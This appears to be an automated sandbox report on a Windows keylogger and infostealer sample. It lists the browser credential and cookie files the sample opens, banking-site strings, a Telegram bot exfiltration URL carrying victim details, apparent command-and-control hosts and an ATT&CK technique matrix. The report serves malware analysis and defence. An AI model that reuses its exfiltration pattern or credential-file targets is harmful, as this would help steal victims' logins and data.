Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.00000000345DB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | API call chain: ExitProcess graph end node | graph_0-4509
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | API call chain: ExitProcess graph end node | graph_0-4515
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02BD3E09 rdtsc | 7_2_02BD3E09
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress | 0_2_00406252
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Process created: C:\Users\user\Desktop\GBYfjUz4a5.exe "C:\Users\user\Desktop\GBYfjUz4a5.exe"
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Users\user\Desktop\GBYfjUz4a5.exe VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW | 0_2_00405F0A
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match | File source: 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: GBYfjUz4a5.exe PID: 7312, type: MEMORYSTR
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: Process Memory Space: GBYfjUz4a5.exe PID: 7312, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: GBYfjUz4a5.exe PID: 7312, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | Registry Run Keys / Startup Folder (1) | Process Injection (11) | Masquerading (11) | OS Credential Dumping (1) | Security Software Discovery (211) | Remote Services | Email Collection (1) | Web Service (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | Registry Run Keys / Startup Folder (1) | Disable or Modify Tools (1) | LSASS Memory | Virtualization/Sandbox Evasion (31) | Remote Desktop Protocol | Archive Collected Data (1) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Application Window Discovery (1) | SMB/Windows Admin Shares | Data from Local System (1) | Ingress Tool Transfer (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | System Network Configuration Discovery (1) | Distributed Component Object Model | Clipboard Data (1) | Non-Application Layer Protocol (3) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (3) | SSH | Keylogging | Application Layer Protocol (14) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Information Discovery (215) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

The number in parentheses after a technique is the count of matched signatures mapped to that technique; techniques without a number were not observed in this analysis.
Source | Detection | Scanner | Label
GBYfjUz4a5.exe | 68% | Virustotal |
GBYfjUz4a5.exe | 50% | ReversingLabs | Win32.Spyware.Snakekeylogger
GBYfjUz4a5.exe | 100% | Avira | TR/AD.NsisInject.fivjh

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nst7D0.tmp\System.dll | 0% | Virustotal |

No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.184.206 | true | false | | high
drive.usercontent.google.com | 172.217.18.97 | true | false | | high
reallyfreegeoip.org | 104.21.96.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2022:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://chrome.google.com/webstore?hl=en0l | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/ | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/8TH | GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/- | GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.1759201605.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.telegram.org | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20- | GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/lB | GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003351D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.1759201605.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en4 | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | GBYfjUz4a5.exe | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=en | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334F1000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334E2000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://varders.kozow.com:8081 | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://aborters.duckdns.org:8081 | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20 | GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/4 | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033522000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.office.com/0l | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033513000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | GBYfjUz4a5.exe, 00000007.00000002.2482541121.0000000002F38000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://anotherarmy.dns.army:8081 | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://chrome.google.com/webstore?hl=enlB | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000334EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333D7000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333AD000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.000000003341D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | GBYfjUz4a5.exe, 00000007.00000002.2505203474.00000000333AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.21.96.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
172.217.18.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.184.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632394
Start date and time: 2025-03-07 23:15:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GBYfjUz4a5.exe (renamed because the original name is a hash value)
Original Sample Name: 3c7ce26361ffddf491732e53dbdb1d457dc651e3709a04dc36cfa751f4333f65.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/30@5/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 194
• Number of non-executed functions: 146
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big; too many NtOpenKeyEx calls found.
• Report size getting too big; too many NtQueryValueKey calls found.
• Report size getting too big; too many NtReadVirtualMemory calls found.
• Report size getting too big; too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:17:52 | API Interceptor | 14663x Sleep call for process: GBYfjUz4a5.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse |
149.154.167.220 | g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse |
149.154.167.220 | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse |
149.154.167.220 | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | bvhauD4o49.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | 0CBJ3aLKx0.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
104.21.96.1 | A2h6QhZIKx.exe | Get hash | malicious | Azorult | Browse | k1d5.icu/TP341/index.php
104.21.96.1 | DHL AWB Receipt_pdf.bat.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/2dxw/
104.21.96.1 | r_BBVA_MensajeSWIFT04-03-2025-PDF.exe | Get hash | malicious | FormBook | Browse | www.kdrqcyusevx.info/k7wl/
104.21.96.1 | MUH030425.exe | Get hash | malicious | Azorult | Browse | k1d5.icu/TP341/index.php
104.21.96.1 | Invoice Remittance ref20250226.exe | Get hash | malicious | FormBook | Browse | www.rbopisalive.cyou/a669/
104.21.96.1 | 368c6e62-b031-5b65-fd43-e7a610184138.eml | Get hash | malicious | HTMLPhisher | Browse | ce60771026585.oakdiiocese.org/r/74?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6
104.21.96.1 | PO.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/sccc/five/fre.php
104.21.96.1 | OEoRzjI7JgSiUUd.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/sss2/five/fre.php
104.21.96.1 | REQUEST FOR QUOTATION 2025.exe | Get hash | malicious | FormBook | Browse | www.clouser.store/3r9x/
104.21.96.1 | http://verification-center-00225526.iwantfoundation.org/ | Get hash | malicious | Unknown | Browse | verification-center-00225526.iwantfoundation.org/banner-b1482d4c.webp
132.226.247.73 | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | l9inNHJqHS.exe | Get hash | malicious | Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | tSftorqHTy.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | DayVXJx1km.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | cexqIzhyvM.exe | Get hash | malicious | GuLoader | Browse | checkip.dyndns.org/
132.226.247.73 | drRbNknjyb.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | pkNnK2ya0f.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | checkip.dyndns.org/
132.226.247.73 | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | checkip.dyndns.org/
132.226.247.73 | ZTEIhNCtP3.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | checkip.dyndns.org/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
reallyfreegeoip.org | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.32.1
reallyfreegeoip.org | BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.80.1
reallyfreegeoip.org | lvrHOgPXr5.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.16.1
reallyfreegeoip.org | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.64.1
reallyfreegeoip.org | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.64.1
reallyfreegeoip.org | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.48.1
reallyfreegeoip.org | 1258ad6Jpw.exe | Get hash | malicious | GuLoader | Browse | 104.21.16.1
reallyfreegeoip.org | iFoDComHqT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 104.21.112.1
reallyfreegeoip.org | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.16.1
checkip.dyndns.com | sWr3wJ0SuB.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 158.101.44.242
checkip.dyndns.com | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | BtCQu5APhK.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | lvrHOgPXr5.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 193.122.6.168
checkip.dyndns.com | s6R3Xjt79e.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 132.226.247.73
checkip.dyndns.com | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.247.73
checkip.dyndns.com | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | 1258ad6Jpw.exe | Get hash | malicious | GuLoader | Browse | 158.101.44.242
checkip.dyndns.com | iFoDComHqT.exe | Get hash | malicious | MSIL Logger, MassLogger RAT | Browse | 193.122.130.0
checkip.dyndns.com | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 132.226.8.169
api.telegram.org | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
api.telegram.org | g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse | 149.154.167.220
api.telegram.org | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
api.telegram.org | cqWZtEH4eJ.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | axN56TZ3PI.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | bvhauD4o49.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
api.telegram.org | 0CBJ3aLKx0.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | HCoITD94bW.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
TELEGRAMRU | g44YQtTyjN.exe | Get hash | malicious | DarkCloud | Browse | 149.154.167.220
TELEGRAMRU | OtldpQxzAw.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | GuuQOl5kJR.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | hUMdKouQ1H.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 149.154.167.220
TELEGRAMRU | xnlP06YunJ.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
